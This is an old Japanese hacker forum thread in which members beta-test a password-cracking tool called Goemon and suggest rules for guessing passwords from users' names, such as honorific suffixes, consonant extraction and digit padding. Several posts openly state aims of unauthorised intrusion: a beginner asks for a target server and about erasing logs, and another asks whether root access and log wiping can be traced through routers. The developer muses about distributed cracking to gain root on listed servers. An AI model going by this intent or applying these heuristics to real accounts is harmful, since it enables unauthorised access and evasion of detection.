| 【メッセージ】 Penguin BBS開設一ヶ月目、おめでとうございます。 って、そんな状況じゃありませんか。>うにゅんさん。 復旧頑張ってくださいね。 私は、つい最近まで大容量バックアップとれるような環境でなかったので、 2度ほどデータを虚空の彼方へ飛ばしたことがありますよ。 でも、大したデータも持っていなかったので、すぐに元通り。 ある意味、悲しかったです・・・。 しかし、今はセカンドマシンを買ってLANでつなぎ、 大ではないけどバックアップがとれるようになりました。 3.5万円ほどでLAN環境も手に入ったし、 いやあ、いい買い物をしました。 |
| 【名 前】うにゅん 【タイトル】re:(1)ちょっと質問です。 12/01 00:25 |
|
| 【メッセージ】 >かなりの時間削減になると思うんですけど。 辞書ruleは、そういう感じになってるんですけど、ID ruleの方は 開発中は、どうせ辞書ruleに比べてかなり短時間で終わるからいいか って思って、そういうのにしてませんでした。 後で、数字の5桁化とか色々出てきたんで、やっぱ時間かかりますね。 考えてみます... |
| 【名 前】Rorrim 【タイトル】ちょっと質問です。 11/30 16:04 |
49-hack@ijk.com |
| 【メッセージ】 五右衛門君でID-Ruleによるクラック率の比較をしていて 疑問に思ったんですけど・・・ クラックスピードで比較すると Joe→Tiny→Compuct→Small→Large→Huge の順ですよね? 実際のPassをクラックする時、いきなりLarge-Ruleを指定しても Joe→Tiny→・・・という風に一個のPassに対してJoeで試して それで解けなかったらTinyのJoe−Ruleを除く部分で試して、 駄目ならCompuctのJoeとTinyを除く部分で試すって言う風に できますか? かなりの時間削減になると思うんですけど。 基本アルゴリズムからの変更になっちゃいますかね? |
| 【名 前】うにゅん 【タイトル】re:(2)やっちまった... 11/30 02:03 |
|
| 【メッセージ】 >大丈夫ですか...頭? :-) 今でもヤバいです。明日の朝は生ゴミの日なんで、いっしょに 捨ててきます(泣) |
| 【名 前】うにゅん 【タイトル】re:(1)He? 11/30 01:58 |
|
| 【メッセージ】 >私みたいに徹夜ばっかりすると耳が聞こえなくなるかも。 え? それってマジですか? やっぱり健康第一ですね。 23歳くらいから、初詣では健康祈願するようになりました(笑) |
| 【名 前】reverse 【タイトル】re:(1)やっちまった... 11/30 01:26 |
esrever@usa.nethttp://members.tripod.com/~reverse/ |
| 【メッセージ】 >頭が急に腐ってWinをブッ壊してしまいました。 あぁ。Linuxで...。 大丈夫ですか...頭? :-) 私もかなりのインストールマニア(笑)で、土曜にWin98を今日はNTをインストール。 Win95/98はやっぱりヘボヘボ。3日ともたなかった。 |
| 【名 前】うにゅん 【タイトル】re:(1)はっ!(汗) 11/30 01:00 |
|
| 【メッセージ】 >そ・・それって・・・ひょっとして・・・・(爆汗) いや、いいんです。私がアホでした。 何をネボケタか、Winのパーティションにインストールしてしまいました(笑) しかも、system commander導入時点で気づくというアホさ... 一度、私のhome以下のファイルを後輩に破壊された時は、 マジで怒りましたけど、今回はやっちゃたのが自分だからいいんです。 で、大急ぎでソース復旧中です〜 |
| 【名 前】k00L 【タイトル】はっ!(汗) 11/29 23:30 |
WEBMASTER@BACKSECTION.office.ne.jphttp://BASE.OC.TO |
| 【メッセージ】 >とある鯖のセキュを試そうと、 そ・・それって・・・ひょっとして・・・・(爆汗) ・・・・・責任とります(号泣) >ACさん 復活ですか♪ そろそろメルしてもいいですか? ACさんぁゃιぃことしまくりで怖くてメルできないっす(汗) |
| 【名 前】AC 【タイトル】He? 11/29 15:55 |
|
| 【メッセージ】 うにゅんさん大変ですね〜、復帰。 私みたいに徹夜ばっかりすると耳が聞こえなくなるかも。 今左耳が終わってしまいました(^^; ヤバイ・・・。 |
| 【名 前】cha_OS 【タイトル】re:(1)やっちまった... 11/29 06:19 |
cha_os@mail.goo.ne.jp |
| 【メッセージ】 ども、 つらそうですね、私も今月はPCを3回っも再インストールしました。 今は、FreeBSDをインストールして設定中です。(^^;;; UNIX系は初めてなので混乱して全然前に進みません。 うにゅんさんもがんばってくださいね。 それでは。 |
| 【名 前】うにゅん 【タイトル】やっちまった... 11/29 05:31 |
unewn4th@usa.net |
| 【メッセージ】 やっちまいました。 とある鯖のセキュを試そうと、死んでたLinuxを最インストール中に 頭が急に腐ってWinをブッ壊してしまいました。 しかたなく、2'ndマシンで遊んでます〜 って、をいおい... メインマシンには、数々のソースが... って訳で血の気が引いたわけです。 仕事関連の一部のソースが消え、あとxtcpは旧バージョン、五右衛門 もα2しか残ってない... 今からダッシュで復元します(泣) おまけに、Linuxは新しく買ったPCIモデムが認識されんし、Xが なぜか動かんし。今日の運勢は大凶です。 以上、日記でした〜 |
| 【名 前】うにゅん 【タイトル】re:(1)一時停止 11/28 17:35 |
unewn4th@usa.net |
| 【メッセージ】 >進行状態をセーブして 私も一瞬考えたんですが、save後、rule編集やpasswd,辞書ファイル を操作すると、誤動作や矛盾の原因になります。たしかに、動作中に ゴエモン以外でそういうことをやると誤動作の原因になりますが、 動作中かそうでないかで切るのが妥当だと思います。 ホントはゴエモンが使用中のファイルはロックするのが、いいん ですけどね。 で、とりあえずVer0.30αのskipスタートで代用ですね。 これだと、再開するルールと辞書位置をユーザが指定するので 誤動作の原因にはなりません(ちょっと手間ですが)。 |
| 【名 前】cha_OS 【タイトル】一時停止 11/28 10:29 |
cha_os@mail.goo.ne.jp |
| 【メッセージ】 ども、ちょっとkOOLさんの意見を見て思ったのですが、 進行状態をセーブしてプログラムを閉じても、またそこからロードして再開できる機能なんてどうでしょうか? 再起動したいときとか有るとけっこう便利だと思うのですが・・・・・・ 素人意見ですので無視してくださってもけっこうです。(^^;;;(ほんとに素人なんで・・・) それでは。 |
| 【名 前】うにゅん 【タイトル】re:(1)素晴らしい 11/27 22:03 |
unewn4th@usa.net |
| 【メッセージ】 >DES暗号製造機CGI(仮名)でいろんなパターンの暗号作って >速度チェックしてます。 私も、自動crypt作ってやってみました。 でもWin98だとc/sはjohnに追い付いてなかったように思います。 でも、johnのDES_Cryptionを移植してやってみたんですが、 これがゴエモンのほうが早いんですよ。なんで? 移植法が悪いのか、別になにかあるのか... >「一時停止ボタン」つけられないっすか?(笑) あ、そういえばStopボタン押してもクラック続くんですよね。 了解です。なおしておきます。 |
| 【名 前】k00L 【タイトル】素晴らしい 11/27 21:38 |
WEBMASTER@BACKSECTION.office.ne.jphttp://BACE.OC.TO |
| 【メッセージ】 いいですゴエモン・・・ マシンはNTserver4.0+Pen300MHzで試しました。 体感的にはJohnよりは速いです。 でも、Passwdによるでしょうね(笑) DES暗号製造機CGI(仮名)でいろんなパターンの暗号作って 速度チェックしてます。 んで、難しいバグ取りは皆さんにお任せして(笑) 前から思っていた超素朴な疑問なんですが、「一時停止ボタン」つけられないっすか?(笑) ちょっと途中でネットしたくなったときとか便利ですよね。 長期戦にも耐えられるし。 どれでもそうかもしれんけど、特にNTだとリソース食いまくって 回してる時はなんにもできんっす(死) |
| 【名 前】cha_OS 【タイトル】石川五右衛門 11/27 19:41 |
cha_os@mail.goo.ne.jp |
| 【メッセージ】 いや〜、使いやすいです!!! 私みたいな初心者でも、使いこなすまで行かなくても結構使えてます。(^^;; 今度は自分でpassを頂いてきたいです。 どこかいいターゲット知りませんか? 技術を身につけるには実行してみないと・・・・ ログ消しうまくいくかなぁ・・・・・ 先客居ないかなぁ・・・・・ 侵入する時のIDはどうしよ〜(^^;;; と不安いっぱいです。どなたか色々教えてくれませんか? お願いします〜。誰か師匠になって下さい。 いつも同じ事書いてるような気がしますが・・・・ それでは。 |
| 【名 前】walkon 【タイトル】すご 11/27 19:15 |
walkon@24h.co.jp |
| 【メッセージ】 おひさしぶりです。 最近すごいですね、五右衛門。 すごい完成度をもって完成しそうですね。 ほんとすごいです。 がんばってください。 では、通り掛かりの感想文でした(^^; |
| 【名 前】うにゅん 【タイトル】まとめ〜 11/27 18:01 |
unewn4th@usa.net |
| 【メッセージ】 Ruleに関するご意見も色々出てきたので、そろそろインプリメント しようかと思います。仕様書とにらめっこしながら。 月曜あたりにβを出して配布を開始しようかと思います。 βも正式版じゃないので、まだ性能的な問題が(バグも)あると 思いますが。あと、β出したら、ディフォルトルールも募集します のでよろしくね。 そろそろ、コンテンツも更新しないと... |
| 【名 前】くろーりく 【タイトル】コンニャクは切れない? 11/27 17:36 |
|
| 【メッセージ】 ゴエモンもりあがっちょりますね。 学校のunixマシンしか無いので指をくわえてみておりマス。 そんな中、プログラミングがさっぱり分からないワタクシ、、、 [C言語で学ぶセキュリティ]の今後がとっても楽しみです。 |
| 【名 前】うにゅん 【タイトル】re:(1)質問です 11/27 17:21 |
unewn4th@usa.net |
| 【メッセージ】 >とあります。ということは第2階層の『ID Normal』にチェックを >入れた時点で、第1階層で選択したruleが実行されるということ >なんでしょうか? というか、第1階層で生成された文字列をそのまま第3階層に 引き継ぎます。 >何も選択していなければ=ID Normal,でいいのではないかと思います。 辞書ルールは、複数ルールを順番に処理するんですが、もし Normalチェックボックスをなくしてしまうと、 DictRule1では、第1Normal、第2Normal&先頭大文字、第3Normal DictRule2では、第1Normal、第2大文字&小文字化&反転-第3Normal みたいな使い方ができなくなり、試行の重複が生じて効率が悪く なります。ルール構造をツリーで表現し、各ノードでON/OFF判定 するのがスマートかと思いまして。 マニュアルには、もうちょっと分かりやすい図なんかを付けないと 混乱するかもしれませんね。 >それと、第三階層の『ID Normal』のチェックを外すと、 >ID ruleそのものが無効になるようです。 えぇ... それだとバグです。調べてみます。 ただ、各階層には、かならずどれかのルールがチェックされていない と、ルールツリーが完成しないので、最低一つづつルールを適用 させてくださいね。 >どうも運用文字列だけのチェックは動作していないような気がします もしそうなら、ソレもバグ... 調べてみます。 |
| 【名 前】うにゅん 【タイトル】re:(1)ども 11/27 17:05 |
unewn4th@usa.net |
| 【メッセージ】 >メル届きましたか?>メーアド また化けてましたか... やっぱココからだと問題ありですね。 今晩、BBSにおじゃまします〜 |
| 【名 前】k00L 【タイトル】ども 11/27 12:06 |
WEBMASTER@BACKSECTION.office.ne.jphttp://BASE.OC.TO |
| 【メッセージ】 >うにゅん氏 メル届きましたか?>メーアド 届いてなかったら再送しますのでお手数ですが連絡願います。 |
| 【名 前】SideWalk 【タイトル】質問です 11/27 07:17 |
|
| 【メッセージ】 ID ruleの動作チェックをしてたんですが、その際わかりにくい 部分があったので教えて頂けますでしょうか。 まず、第1階層、第2階層、第3階層それぞれで『ID Normal』の チェックボックスがありますが、マニュアルには >前階層で生成された文字列そのまま とあります。ということは第2階層の『ID Normal』にチェックを 入れた時点で、第1階層で選択したruleが実行されるということ なんでしょうか? だとすれば、『ID Normal』のチェックボックスは無くして 何も選択していなければ=ID Normal,でいいのではないかと思います。 それと、第三階層の『ID Normal』のチェックを外すと、ID ruleその ものが無効になるようです。これは意図的なものならば、『ID ruleは 使わない』というチェックがあった方が判り良いと思います。 既に出ているかも知れませんが、名前がtarouの時[N1 4文字] で、+数字4桁 → taro9999 のようなpassの場合で、私は 「じゃぁ第3階層の数字3桁にチェック入れて『後ろに文字列を追加』に [1 2 3 4 5 6 7 8 9 0]ってやれば9999になるだろう」とやってるんですが…。 私だけかも知れませんが、過去の例では数字だけの組み合わせというの が結構ありましたので、辞書rule(適用文字列設定)に[0123456789]と やってみたんですが、どうも運用文字列だけのチェックは動作していないよう な気がします。私の設定ミスかもしれませんので、どなたか確認お願いします。 |
| 【名 前】うにゅん 【タイトル】ほー 11/27 01:48 |
|
| 【メッセージ】 kazutさん案の拒否ルールは必須ですね。 >Ruleに「kun」や「chan」を付けてほしいな〜なんて思います。 たしかに、拒否が多くなるかもしれませんが、日本人の名前 辞書と組み合わせるときは、先頭n文字適用 + kun,chan は有効ですね。kenichi,kenji,kenta,kensukeなどもkenchan でイケますし。 辞書毎に色々ルールを設定する必要もありそうですね。 >あんまり色々付けると重くなるかな〜 選択ができるんですから、これはあまり気にしないでください。 可能性のあるものは、機能としてもっておくべきですから。 配布時に煮詰めて、ディフォルトルールを決定すればいいですので、 現段階では、たとえ「ちょっとおもったこと」でも貴重な意見です。 |
| 【名 前】kazut 【タイトル】re:(1)早速ですが・・・ 11/27 01:33 |
|
| 【メッセージ】 >第3階層にて前後x文字削ると同時にx桁の数を追加することのできる >オプションがあると効率よくヒットするのではないかと思います。 >ex. hiroaki -> hiro777 UNIXのパスは8文字までなんでRuRuさんのこの案と組み合わせると 良さそうですね あと削らなくてもchanの時は5文字以上の時は拒否、kun,sanの時は6文字以上の時は拒否すれば 早いルールになると思います。( +記号、数字を含む時も拒否 ) 特に4文字以下のID使ってる人は少ないのでchanはかなり早いです(^^;;(拒否しまくる) |
| 【名 前】Rorrim 【タイトル】早速ですが・・・ 11/27 01:06 |
49-hack@ijk.com(Its alive!!) |
| 【メッセージ】 早速拝領いたしました。 ちょっと使ってみた感じですが、いいですね〜 なんか「白木葉子」っぽいインターフェイスが気に入ってます。 私は日本のISPをよくチェック(?)するので Ruleに「kun」や「chan」を付けてほしいな〜なんて思います。 例)goemon ishikawa -> goemonkun isikawakun goemonchan isikawachan 他の人たちはどうでしょうか? あると便利だと思うんですけど・・・ あんまり色々付けると重くなるかな〜 |
| 【名 前】うにゅん 【タイトル】re:(1)「五右衛門」の提案 11/27 00:55 |
|
| 【メッセージ】 >1文字おきの文字列でチェックできるようにするといいと思います。 そういえば、子音だけとって誕生日ひっつけて、パスワードにする人 も結構いますね。 (例) Tanaka : tnk1011 文字飛ばしや、子音抽出も要りますね。 >さらにその前に文字列を追加したくてもできません。 これは、kazutさんに提供してもらったアイデアを拡張して 数字・文字を桁毎に指定できるようにする予定です。 >ID Rule第1階層でID以外の文字列が設定できるようになるといいかも知れません。 ID Ruleの方では、基本はIDと氏名の変形ですので、辞書ルールの 方がスッキリするかと思います。 >クラック成功時や実行終了時に、ビープ音でもなるようなると嬉しいです。 こりゃいいですね(笑)。早速次のバージョンからやります。 指定電話番号に自動で電話して結果を知らせるオプションなんかも あるといいですね。そんでrootとれたとか色々教えてくれて... (やりすぎか) |
| 【名 前】Hariru 【タイトル】「五右衛門」の提案 11/26 23:50 |
|
| 【メッセージ】 1文字おきの文字列でチェックできるようにするといいと思います。 例)goemon ishikawa ---> geoihkw or geosiaa or omnihkw or omnsiaa lupan ---> lpn or ua これだけでもいいと思いますが、 短い場合がありますので、それらに入らなかった文字列を加えたりしてもよいです。 例)goemon ishikawa ---> geoihkwomihkw or geosiaaomnihkw or ... lupan ---> lpnua or ualpn 単なる文字列のお遊びですが、以前(今も?)私もやっていたので効くと思います。 また、ID Rule第3階層で文字列の前に数字を挿入できるのですが、 さらにその前に文字列を追加したくてもできません。 たとえば、名前がgoemon ishikawaで、passwordがg6ishikawaの場合などです。 あっ。ちなみにg6とは、goemonの文字列がgで始まり、6文字あるという意味です。 これもRuleで使えますかね? もう一つ欲を言うならば、 ID Rule第1階層でID以外の文字列が設定できるようになるといいかも知れません。 たとえば、根を取るときにホスト名などが使えれば良さそうな感じがしましたので。 最後に、完成版の方でもいいですが、 クラック成功時や実行終了時に、ビープ音でもなるようなると嬉しいです。 「五右衛門」の反応が少ないので、なんだか寂しいです・・・。はい・・・。 以上、今まで思いついたことを並び立ててみました。 参考になれば幸いです。 |
| 【名 前】SideWalk 【タイトル】re:(6)test 11/26 22:06 |
|
| 【メッセージ】 >DOS、Win、UNIX共通のインタフェースで動くようにする ぎえー! それですそれそれ。素晴らしいですね。 私が動員できるマシン台数はせいぜい30台くらいのもの ですが、みんなであつまって数百台とかになれば、 『パスワード解析屋』なんかもできちゃいますね〜。 |
| 【名 前】pargatory 【タイトル】ルータ 11/26 17:48 |
|
| 【メッセージ】 うにゅんさんk00Lさん レス有難うございました。 打倒、JOHN、頑張って下さい。 御手伝い出来ない(←SKILLなし)、自分が悲しいです・・・ 皆さんの会話、半分理解出来ないし・・・ もっと、勉強しなくては・・・ |
| 【名 前】うにゅん 【タイトル】re:(1)初心者側の意見 11/26 14:59 |
unewn4th@usa.net |
| 【メッセージ】 >もし、この設定がいいよって感じでRuleが出回るようになると、 >とても便利なように感じられます。 リリース前に、無節操に配布していないのは、配布前の評価 はみなさんからの意見をまとめて、デフォルトルールを作る っていう狙いもあります。 つまり、初心者の方でも、パスファイルと辞書ファイルを 選んで、Goボタンを押せば、ある程度のパフォーマンス (解析能力/解析時間)が出るようにするのも、重要な課題ですから。 >DLしたWin用「白木葉子」に簡易マニュアル(man.txt)がありませんが、 >あれって付けていないのでしょうか。 以前、そんな指摘があってその時アップしなおしました。 今はちゃんとありますので。 |
| 【名 前】Hariru 【タイトル】初心者側の意見 11/26 14:25 |
|
| 【メッセージ】 以前、「五右衛門」づくりの方は手伝えないとカキコしましたが、 みなさんに書き込み刺激を受け、「五右衛門」をDLさせてもらいました。 ありがとうございます。>うにゅんさん 多機能のようで、中級者以上の方は便利に感じられると思いますが、 crackの右も左もわからない(私)ような初心者には、 少し取っつきにくいかも知れません。 しかし、それでもJohnよりはわかりやすくてとても良いです。 マニュアルが日本語だからってこともありますけど。(笑) 後、今どんなID Ruleや辞書Ruleが選択されているのかわかるように、 設定欄にどういうRuleなのかコメントが付くになるようになるといいです。 付属のmanual.txtの方に書いてありますが、 もし、この設定がいいよって感じでRuleが出回るようになると、 とても便利なように感じられます。 ps. 話題が違いますが、 DLしたWin用「白木葉子」に簡易マニュアル(man.txt)がありませんが、 あれって付けていないのでしょうか。 少し気になっての質問です。 |
| 【名 前】うにゅん 【タイトル】re:(5)test 11/26 09:11 |
unewn4th@usa.net |
| 【メッセージ】 >その方法だと五右衛門のインクリの機能追加でできませんか? こうしようと思ってました(笑) でも、これだとWin専用ってのもキツイ話ですね(台数の問題)。 五右衛門のサブツールとして、いっしょにつけるようにして、 DOS、Win、UNIX共通のインタフェースで動くようにするほう がいいでしょう。コレなら、 たくさん拾ってきたMS-DOSマシン+自宅のwin+大学演習室の 全UNIX+アレなリストの鯖全部でroot狙いってのもできるか もしれませんね。 |
| 【名 前】SideWalk 【タイトル】re:(4)test 11/26 07:15 |
|
| 【メッセージ】 あ、いや、すいません。 書き込んでからよ〜く考えたら、サーバじゃなくてもいいんです。 つまり、インクリの開始場所ってのが数十段階に区切ってあって、 一台の端末で処理するブロックを決められれば同じことだと 気がつきました。その方法だと五右衛門のインクリの機能追加 でできませんか? とは言っても数千兆wordくらいあると思うんですが…。 |
| 【名 前】Rorrim 【タイトル】ありゃ? 11/26 01:10 |
49-hack@ijk.com(Maybe its dead;) |
| 【メッセージ】 うそ〜? 死んじゃってんのかな〜?メールアドレス。 大変申し訳ないです。 こちらから確実な(生の)メールアドレスでメールいたします。 お手数お掛けします。 |
| 【名 前】cれst 【タイトル】たいへんお久しぶりです:) 11/25 23:56 |
|
| 【メッセージ】 なにやら、難しいかつ大変たのしそうなお話をしてらっしゃいますね:) とりあえず、ROMってます。 |
| 【名 前】うにゅん 【タイトル】Rorrimさん 11/25 20:29 |
unewn4th@usa.net |
| 【メッセージ】 あれ〜。メール届かないですよ>Rorrimさん 49-hack@ijk.com 死んでるんですか? |
| 【名 前】cha_OS 【タイトル】石川五右衛門 11/25 17:51 |
cha_os@mail.goo.ne.jp |
| 【メッセージ】 ども、2回目の書き込みです。 石川五右衛門ですか・・・・すげぇ切れそうですね。 ripperも顔負けですね・・・・・何しろ斬鉄剣ですから。 売り文句は「鉄をも切る石川五右衛門」ですか?(^^;;; 私は初心者なんでツールですら旨く使えないかもしれませんが、 試させてくれませんか?お願いします。 と言うよりも、passを取ってくることが先決なんですけども・・・ 実際にとなるとなかなか実行できません。 初心者練習用のサーバって無いですかね?(^^;; どなたか師匠になってくださ〜い。(^^;; このどうしようもない初心者に色々後伝授してくれませんか? |
| 【名 前】うにゅん 【タイトル】re:(3)test 11/25 14:58 |
unewn4th@usa.net |
| 【メッセージ】 >インクリモードが分散でできたら…。 なるほど。た〜くさんのPCでインクリやれば、それなりにって ヤツですか。できると思いますので、ちょっとやってみますね。 できたら、インクリ専用ってのをUNIXでも出しますね。 |
| 【名 前】うにゅん 【タイトル】re:(1)ちょっと一言 11/25 14:53 |
|
| 【メッセージ】 >よってデフォルトはJohnと同水準のruleに >合わせておいた方が良いのでは? 今,ディフォルトではlargeルールですが、 ええと、john同水準ってたぶんsmallルールですよね。 今現在は、DES-Cryptionアルゴリズムの関係で、 C/Sがjohnの1.5倍かかってますから、largeはアルゴリズム が複雑な分、johnと比べてかなり時間がかかりますね。 でも、ディフォルトでjohnより多くクラックさせたいので、 largeにしたんです。 これについて、みなさんはどう思いますか?だいたい、どの程度 のCPUをみなさんが使ってるのか良く分からなかったんで、適当 にlargeにしましたが... >現在選択してるruleファイルを表示するlabel >があった方が便利かも知れませんね。 これ、私も考えたんですが、カスタマイズしちゃうと表示が 問題かなって思ったんです。でも、良く考えると、ちょっと でもカスタマイズした場合は、「カスタマイズ」って表示 すりゃいいのか... 分かりました。検討してみます。 |
| 【名 前】うにゅん 【タイトル】re:(1)ふ〜む 11/25 14:43 |
unewn4th@usa.net |
| 【メッセージ】 >ベンチマークは自由参加でしょうか? >資格(?)っているんでしょうか? ないですよ。あっても、RorrimさんならOKですよ。そもそも ココの協力者じゃないですか〜 ってことで、メールしてきました。 あと、Hariruさんも。 色々、意見をお願いします。 |
| 【名 前】SideWalk 【タイトル】re:(2)test 11/25 14:20 |
|
| 【メッセージ】 うげ! testさん凄いこと言いますね。 分散てひょっとしてユーザーグループのやってる クラックコンテストのことですか? インクリモードが分散でできたら…。 夢ですね(笑) >うにゅんさん |
| 【名 前】SideWalk 【タイトル】ちょっと一言 11/25 14:07 |
|
| 【メッセージ】 昨日は忙しかったんで今日がんばります。 ところで、五右衛門を一般公開する時の設定なんですが あまりに多機能過ぎてJohnと比べて異常に遅く感じてし まいます。よってデフォルトはJohnと同水準のruleに 合わせておいた方が良いのでは? ということはどっかに現在選択してるruleファイルを 表示するlabelがあった方が便利かも知れませんね。 |
| 【名 前】Rorrim 【タイトル】ふ〜む 11/25 12:58 |
49-hack@ijk.com |
| 【メッセージ】 なにやら色々面白そうですね〜<石川君 いま手元にDOS機のない私も ちょっと試してみたくなってきましたぞ。 ふ〜、友達に貸したIBM取り返そうかな〜 Solaris7も来たことだし・・・ ベンチマークは自由参加でしょうか? 資格(?)っているんでしょうか? |
| 【名 前】うにゅん 【タイトル】追加 11/25 06:50 |
|
| 【メッセージ】 Ver0.20α3のマニュアルで、次期バージョンアップの項目に追加 があります。 passwdファイルの"名前"の部分の区切り文字がISPによって結構異なる ので、 Yamada Taro Yamada,Taro Yamada/Taro Yamada_Taro Yamada-Taro をサポートする予定です。 |
| 【名 前】うにゅn 【タイトル】取り急ぎ 11/25 06:37 |
unewn4th@usa.net |
| 【メッセージ】 potや結果出力ができない等は問題アリなので、実験効率効化を図る ための機能を取り急ぎ追加しました。 現バージョンは Version0.20α3です。 とりあえず、Rulesは、ID Ruleのバグ修正だけです。 [VerUP項目] ID Rule, 辞書 Ruleの個別解析 John the ripper互換のpotファイル クラック試行過程のファイル名選択 John the ripper互換の結果text出力 解析異常防止のため、クラック中はルール編集やファイル名変更等は禁止 1単語あたりの解析パターン数(Patterns/Word)を表示 ID Rulesの「N2 1 文字 + N1 1文字」にバグがあったので修正 結果表示リストボックスの出力形式を"ユーザ名:パスワード"に変更 Stopボタンで警告を出す Rules更新後のファイル読み込みや編集キャンセル時、ファイル上書き時に警告 |
| 【名 前】HiRoShi 【タイトル】ちょっと 11/25 02:39 |
|
| 【メッセージ】 >最初「過程をファイルに保存」がそれだと思ってチェック入れて >走らせてたんですがマニュアルとファイルサイズ見てたまげました(笑)。 僕もたまげました。100Mオーバーになってた... まだあまり試していませんが、使いやすいです。 とりあえず、インクリモードが欲しいですね。(笑) また、じっくりいじってみます。 |
| 【名 前】うにゅん 【タイトル】追加予定 11/24 22:50 |
unewn4th@usa.net |
| 【メッセージ】 色々出たので、βより前にα3を早急に作ります。 更に追加ですが、 (1) 現在passwdは2000行までなので、もっと。 (2) クラック結果をjohn互換形式、ID:passwd形式でファイル出力 (3) IDrule,辞書ruleを別々に開始できるようにする (4) リストア機能 (5) Stopボタンで警告を出す 以上、kazutさん (6) ファイル操作時に警告を出す (7) 辞書の整形機能(n文字以上を抽出、強制的にn文字にする 全小文字変換、重複除去など) (8) DES化パスワードファイルのマルチフォーマット化 以上、私 小さい辞書での比較評価もやってみてくださいね > みなさん |
| 【名 前】うにゅん 【タイトル】re:(1)要望です 11/24 20:18 |
unewn4th@usa.net |
| 【メッセージ】 >第3階層にて前後x文字削ると同時にx桁の数を追加することのできる なるほど。 >結局は第1階層の文字数を増やすことと同じになりますか。 たしかに、これで代用可能ですね。 了解しました。0〜8文字をサポートすることにします。 引き続き、お願いします。 あと、Ruleプログラムにもバグがあるかもしれないので、 そのあたりのチェックもお願いしたいです。 クラック試行課程をファイルにとるっていうチェックボックス をチェックすれば、progress.txtに落ちるので、よろしく お願いします〜。 |
| 【名 前】RuRu 【タイトル】要望です 11/24 18:58 |
|
| 【メッセージ】 シングルモードでデフォルトのルールを用いて試してみました。 結果、john+kazut.iniの組み合わせほどヒットしませんでした。 第3階層にて前後x文字削ると同時にx桁の数を追加することのできる オプションがあると効率よくヒットするのではないかと思います。 ex. hiroaki -> hiro777 或いは全体を8文字に固定して前後を数字で置き換えていけるようにする・・ 結局は第1階層の文字数を増やすことと同じになりますか。 |
| 【名 前】kazut 【タイトル】re:(3)ひゃ〜すげ! 11/24 18:21 |
http://members.xoom.com/k2japan/ |
| 【メッセージ】 >同じpasswd、同じ辞書でjohnの標準ルール、modifiedルール 了解です〜 五右衛門のデフォルールが数字系統をたくさんサポートしているので ジョンより多くクラックできるような気がしてます 今から試してみますね |
| 【名 前】うにゅん 【タイトル】re:(2)ひゃ〜すげ! 11/24 18:09 |
unewn4th@usa.net |
| 【メッセージ】 おおっ、やってくれてるんですね。kazutさん。 キャプチャ画面では、まだクラック途中ですが結果が気になる〜 同じpasswd、同じ辞書でjohnの標準ルール、modifiedルール でも試してもらえますか? |
| 【名 前】k00L 【タイトル】う〜ん・・・ 11/24 18:01 |
http://BASE.OC.TO |
| 【メッセージ】 >うにゅん氏 メルバケバケっすぅ(泣) でも位置はわかりましたので頂きました(謎) >アノイのメールボムやICPボムは、 >犯人を割り当たられることが可能なのでしょうか? ハッキング的手法なら難しい・・・こともある。 でも、それ以外の手を使えば割り出せます。(謎) っつーか、**とか***が本気になれば一発バレです。 |
| 【名 前】kazut 【タイトル】re:(1)ひゃ〜すげ! 11/24 17:27 |
http://members.xoom.com/k2japan/img/goe_c.jpg |
| 【メッセージ】 >しょっぱなからGUIで来るとは思ってなかったのでメニューの時点で >感動してしまいました(笑)。 同じく解凍した時点で感動しちゃいました(^^;; それプラス分かりやすいUI、やさしいマニュアルで 打倒ジョンも夢じゃないですね。 うーんすごい〜 なんとなくキャプチャしてみました(^^;;>五右衛門 |
| 【名 前】うにゅん 【タイトル】re:(1)ルータ 11/24 16:16 |
unewn4th@usa.net |
| 【メッセージ】 >アノイのメールボムやICPボムは、 >犯人を割り当たられることが可能なのでしょうか? 可能な場合もあります。 でも、ログ見たりキューをチェックすればSPAMやられた なってことくらいは分かることもあります。 でも、普通は***です(笑)。 >誰がアクセスしたかルータに残ってると言いますが・・・ >大丈夫なのでしょうか? ルータの種類やその設定によります。 バリバリとフィルタリング&監視やってるとこだと変なこと やると速攻通報されます。 Firewall的な使い方してても、ヘボ設定やヘボルータだと スルリって感じですが、ちゃんとしてれば、何をやろうと したかとかも、ある程度特定できます。 でも、普通の所は***ですから、**しても問題ないです(笑)。 |
| 【名 前】うにゅん 【タイトル】re:(1)あい(汗) 11/24 16:07 |
unewn4th@usa.net |
| 【メッセージ】 >あ・・それからメアカ欲しいですか?? >〜@BASE.OC.TOでよければ作りますので 毎回色々とすいませんね。 penguin@base.co.toでお願いします〜 |
| 【名 前】うにゅん 【タイトル】re:(1)test 11/24 16:06 |
unewn4th@usa.net |
| 【メッセージ】 >五右衛門、分散できたらjohn抜けますね(チガウ 分散ってどういうことですか? もうちょい詳しく書いてもらえますか? |
| 【名 前】うにゅん 【タイトル】評価 11/24 15:31 |
unewn4th@usa.net |
| 【メッセージ】 現段階だと、たぶん不満がいっぱいあると思います。 「改善して欲しい点」とか「これはダメやろ」っていう所は、 遠慮なしにバンバン書いてください。でないと、いいのがで きないですからね。 今まで出た意見ですが、 (1) IDに数字を含む列は拒否とか記号を含む列は拒否とか IDが何文字以上の時は拒否とか拒否系統も加える (2) ルールの数字の追加でIDルールで五桁、 辞書の方も四桁まで追加 (3) 数字・文字追加で、一桁目は0と1、二桁目は0〜9、 三桁目はa〜zみたいに、入れる文字を指定できる 以上、kazutさん (4) passファイルを「userID:Pass」でも読み込めるように (5) rulesは先頭以外の任意のカラムでも大文字-小文字変換 (6) 任意の文字を任意の文字列に置換できる設定を追加 以上、SideWalkさん 貴重な意見、ありがとうございます。βに反映させてもらいます。 potの件、速攻二人につっこまれましたね。すっかり忘れてました(笑) john互換の形式でβからです。 |
| 【名 前】pargatory 【タイトル】ルータ 11/24 15:07 |
|
| 【メッセージ】 ふと、疑問に思ったのですが、 アノイのメールボムやICPボムは、 犯人を割り当たられることが可能なのでしょうか? また、根をGETしてlog消しをやっても、 誰がアクセスしたかルータに残ってると言いますが・・・ 大丈夫なのでしょうか? どなたか、御伝授よろしくお願いします。 |
| 【名 前】pargatory(=skillのない...) 【タイトル】Rorrimさんへ 11/24 15:05 |
|
| 【メッセージ】 レス有難うございました。 JOE・・・ そのような意味があったとは・・・ 勉強になりました。 |
| 【名 前】k00L 【タイトル】あい(汗) 11/24 12:20 |
http://BASE.OC.TO |
| 【メッセージ】 >うにゅん氏 >「ちょっと使ってみたい」人も、メールくれれば配布します。 くらさい(汗) あ・・それからメアカ欲しいですか?? 〜@BASE.OC.TOでよければ作りますので |
| 【名 前】test 【タイトル】test 11/24 11:05 |
|
| 【メッセージ】 五右衛門、分散できたらjohn抜けますね(チガウ |
